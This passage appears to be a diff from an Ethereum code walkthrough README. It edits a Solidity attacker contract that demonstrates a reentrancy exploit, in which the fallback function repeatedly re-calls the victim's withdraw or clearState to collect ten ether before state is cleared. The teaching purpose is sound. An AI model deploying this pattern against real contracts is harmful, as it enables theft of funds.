mm6/ethereum-code-walkthrough_1/README.md

      victim = Victim(victimAddress);

   }
-  // Mallory calls attack and attack makes one withdraw.
+  // The attacker calls attack() and attack() makes one withdraw.
-  // Mallory gets 1 eth added to the eth account of this contract by
+  // 1 eth is added to the eth account of this contract by
-  // making this call.
+  // making the call on the victim.
-  // But, the Victim's withdraw passes ether to Mallory's fallback function.
+  // But, the Victim's clearState() function passes ether to this contract's fallback function.
-  // That function calls withdraw() again before the victim's
+  // That function calls clearState() again before the victim's
-  // code clears the balance.
+  // code clears the state.
   function attack() public  {
-    victim.withdraw();
+      victim.clearState();
   }

   // collects Ether for counter = 1..9.
-  // Plus 1 from above and we receive 10 Eth for clearing the balance. function() payable external {
+  // Plus 1 from above and we receive 10 Eth for clearing the state. function() payable external {
     counter++;
     emit fallbackCalled(counter,msg.value);
     if(counter < 10) {
-      victim.withdraw();
+      victim.clearState();
     }
   }
 }